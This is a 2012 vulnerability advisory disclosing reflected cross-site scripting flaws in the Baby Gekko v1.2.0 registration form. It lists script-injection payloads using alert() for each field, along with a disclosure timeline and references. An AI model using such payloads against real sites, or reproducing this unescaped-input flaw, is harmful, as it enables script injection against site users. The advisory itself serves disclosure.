SSCHADV2012-012 - Baby Gekko v1.2.0 Multiple XSS vulnerabilities
Advisory:
|
Baby Gekko v1.2.0 Multiple XSS vulnerabilities
|
Advisory ID: | SSCHADV2012-012 |
Author: | Stefan Schurtz |
Affected Software: | Successfully tested on Baby Gekko v1.2.0 |
Vendor URL: | http://www.babygekko.com/ |
Vendor Status: |
informed
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
Baby Gekko v1.2.0 is prone to multiple Cross-Site scripting vulnerabilities
==============
PoC-Exploit
==============
http://[target]/gekkocms/users/action/register
Reflected XSS (Tested on WinXP with IE8)
PoC-Exploit
==============
http://[target]/gekkocms/users/action/register
Reflected XSS (Tested on WinXP with IE8)
Desired Username | ‘"/><script>alert(1)</script> |
E-mail address |
‘"/><script>alert(2)</script> |
Password |
‘"/><script>alert(3)</script> |
Verify Password | ‘"/><script>alert(4)</script> |
First Name | ‘"/><script>alert(5)</script> |
Last Name |
‘"/><script>alert(6)</script> |
Reflected XSS (Tested on WinXP with FF7.0.1 and FF12)
When the username or the e-mail already exists the following XSS are also possible!
Desired Username | <already registered> |
E-mail address | <already registered> |
Password |
‘"/><script>alert(1)</script> |
Verify Password |
‘"/><script>alert(2)</script> |
First Name | ‘"/><script>alert(3)</script> |
Last Name |
‘"/><script>alert(4)</script> |
=====
Solution
=====
-
================
Disclosure Timeline
================
05-May-2012 – vendor informed
05-May-2012 – vendor feedback
====
Credits
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References
=======
http://www.darksecurity.de/advisories/2012/SSCHADV2012-012.txt
http://www.babygekko.com/forum/index.php/topic,349.0.html
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5086.php
http://secunia.com/advisories/49023/
http://www.exploit-db.com/exploits/18827/
Comments
Display comments as Linear | Threaded